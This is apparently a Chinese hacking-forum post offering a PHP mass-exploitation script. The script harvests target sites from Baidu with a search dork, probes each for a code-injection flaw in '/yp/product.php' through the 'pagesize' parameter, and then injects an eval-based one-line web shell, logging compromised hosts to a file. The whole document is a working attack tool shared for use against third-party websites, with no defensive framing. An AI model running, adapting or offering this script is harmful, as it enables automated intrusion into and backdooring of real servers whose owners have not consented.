玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为c EXP: #!/usr/bin/php //检测是否存在漏洞 //模拟POST或者GET请求函数。 批量的EXP如下,这威力很大。请各位大牛自重 。 error_reporting(E_ERROR); set_time_limit(0); $keyword=’inurl:about/joinus’ ; // 批量关键字 $timeout = 1; $stratpage = 1; $lastpage = 10000000; for ($i=$stratpage ; $i<=$lastpage ; $i++ ){ $array=ReadBaiduList($keyword,$timeout,$i); foreach ($array as $url ){ $url_list=file(‘url.txt’); if (in_array(“$url\r\n”,$url_list)){ echo “[-] Links repeat\n”; }else{ $fp = @fopen(‘url.txt’, ‘a’); @fwrite($fp, $url.”\r\n”); @fclose($fp); print_r(” [-] Get …… $url\r\n”); if(okbug($url)){ $exploit=exploit($url); $ors=okor($url); if ($ors){ echo “[*] Shell:-> “.$url.”/yp/fuck.php\n”; $fp = @fopen(‘shell.txt’, ‘a’); @fwrite($fp, $url.”/yp/fuck.php\r\n”); @fclose($fp); } }else{ print “[-] No Bug!\n”; } } } } function exploit($url){ $host=$url; $port=”80″; $content ; $data = ‘POST /yp/product.php?pagesize=${${@eval%28$_POST[a]%29}} HTTP/1.1′.”\r\n”; $data .= “X-Forwarded-For: 199.1.88.29\r\n”; $data .= “Referer: http://$host\r\n”; $data .= “Content-Type: application/x-www-form-urlencoded\r\n”; $data .= “User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0\r\n”; $data .= “Host: $host\r\n”; $data .= “Content-Length: “.strlen($content).”\r\n”; $data .= “Cache-Control: no-cache\r\n\r\n”; $data .= $content.”\r\n”; $ock=fsockopen($host,$port); if (!$ock) { echo “[*] No response from $host\n”; } fwrite($ock,$data); while (!feof($ock)) { $exp=fgets($ock, 1024); return $exp; } } function okor($host){ $tmp = array(); $data = ”; $fp = @fsockopen($host,80,$errno,$errstr,60); @fputs($fp,”GET /yp/fuck.php HTTP/1.1\r\nHost:$host\r\nConnection: Close\r\n\r\n”); while ($fp && !feof($fp)) $data .= fread($fp, 102400); @fclose($fp); if (strpos($data, ’200′) !== false) { return true; }else{ return false; } } function okbug($host){ $tmp = array(); $data = ”; $fp = @fsockopen($host,80,$errno,$errstr,60); @fputs($fp,’GET 
/yp/product.php?view_type=1&catid=&pagesize={${phpinfo()}}&areaname=&order= HTTP/1.1′.”\r\nHost:$host\r\nConnection: Close\r\n\r\n”); while ($fp && !feof($fp)) $data .= fread($fp, 102400); @fclose($fp); if(preg_match(‘/(php.ini)/i’,$data)) { return true; }else{ return false; } } function ReadBaiduList($keyword,$timeout,$nowpage) { $tmp = array(); //$data = ”; $nowpage = ($nowpage-1)*10; $fp = @fsockopen(‘www.baidu.com’,80,$errno,$errstr,$timeout); @fputs($fp,”GET /s?wd=”.urlencode($keyword).”&pn=”.$nowpage.” HTTP/1.1\r\nHost:[url]www.baidu.com[/url]\r\nConnection: Close\r\n\r\n”); while ($fp && !feof($fp)) $data .= fread($fp, 1024); @fclose($fp); preg_match_all(“/\}\)\” href\=\”http\:\/\/([^~]*?)\” target\=\”\_blank\”/i”,$data,$tmp); $num = count($tmp[1]); $array = array(); for($i = 0;$i < $num;$i++) { $row = explode(‘/’,$tmp[1][$i]); $array[] = str_replace(‘http://’,”,$row[0]); } return $array; } ?> |